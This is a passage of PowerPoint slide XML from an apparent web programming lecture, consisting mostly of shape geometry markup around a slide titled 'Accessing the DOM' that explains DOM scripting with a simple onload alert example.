              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8472488" y="7362825"/>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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{261D3C3B-E078-D34A-B362-D989FECEBFEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827881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789" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177789" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203179" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1777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3131" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD72D82-CF0F-4845-B627-B7D88B413D25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8443913" y="7405688"/>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2" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67D3F33-A6FC-4048-9FD3-38678DEAD6CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="847248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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E73FB0F-DE70-4F4E-97D7-818DC08C6B6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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4" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1A2CCD-EA58-5B4B-A85E-3D6765FDCBF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7362825"/>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5" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF563198-BA57-1948-A178-6B5522395A24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9043988"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6" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1790E81-464E-E34E-B845-54155FA28C5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9070975" y="7434263"/>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7" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1540EB0-D624-5A4F-ACC9-7F44323F0413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9712325" y="7391400"/>
            <a:ext cx="44450" cy="42863"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 20320"/>
              <a:gd name="T1" fmla="*/ 0 h 20320"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 20320"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 20320"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T4">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="20320" h="20320">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20330" y="20311"/>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8" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFAAB7E-4D3A-1B44-ADE6-593ADEB2ACB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9653588" y="7331075"/>
            <a:ext cx="65087" cy="66675"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T5" fmla="*/ 0 h 30479"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T7" fmla="*/ 0 h 30479"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T9" fmla="*/ 0 h 30479"/>
              <a:gd name="T10" fmla="*/ 0 w 30479"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T12" fmla="*/ 0 w 30479"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T14" fmla="*/ 0 w 30479"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 30479"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 30479"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 304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479" h="30479">
                <a:moveTo>
                  <a:pt x="30388" y="15180"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="30388" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6797" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15179" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23591" y="30373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="23574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30388" y="15180"/>
                </a:lnTo>
                <a:close/>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39" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD99AF43-6CD1-5743-B199-D151DCFC0A7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9480550" y="7323138"/>
            <a:ext cx="103188" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2035069958 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 0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5096" y="49699"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="38471" y="45808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47750" y="35706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47067" y="17943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41428" y="6143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32268" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15804" y="2163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4953" y="9550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20495"/>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40" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37D325FF-37AB-FC4A-89E6-6B71B27A1D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9445625" y="7362825"/>
            <a:ext cx="65088"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41" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB1015B-9EB2-614F-8295-AFF6B830D509}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9815513" y="7323138"/>
            <a:ext cx="107950" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T4" fmla="*/ 0 w 48260"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T6" fmla="*/ 621453573 w 48260"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T11" fmla="*/ 0 h 50164"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 48260"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 50164"/>
              <a:gd name="T16" fmla="*/ 2147483646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2697" y="49705"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9214" y="45814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="711" y="17940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6370" y="6138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32001" y="2169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42849" y="9563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47796" y="20516"/>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142" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0FE93A-196B-BE42-B434-4FE94CDC05FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9888538" y="7362825"/>
            <a:ext cx="66675"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AAA6ADAA-4C00-1A48-ACCA-2D5C24E7F719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="223838"/>
            <a:ext cx="5022850" cy="477837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="82768" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3100" spc="243" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Acc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="11" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="409" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="88" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="506" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA073632-1E16-9342-9E5B-384FA4226CFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9351963" y="7505700"/>
            <a:ext cx="554037" cy="200025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="28057" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>12</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1300" spc="-144" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133145" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7C62DB-8257-004C-8923-BD7D4D2F8787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="806450"/>
            <a:ext cx="8537575"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400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When creating a script (in-line in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>element or by means of a script loading instruction) the API for the document or window elements can be used to manipulate the document itself or to get at the children of that document, which are the various elements in the web page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1325"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> displays an alert message by using the alert() function from the window object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="88"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;body  onload="window.alert(’welcome  to  my  page!’);"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-12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object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3D46426-5694-284A-B066-228B9297FA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="734853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1" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D62E0BA0-AD77-174A-A6BE-9A6BD72AF883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="767556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820" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="177820" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203210" y="19049"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17782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5172" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E0CDEB8-6356-5D4F-B567-948086CA85E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842250"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3" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1F17CD1-8344-1844-BBCF-BCE8352E92D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7869238" y="737711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4" name="object 6">
            <a:extLst>
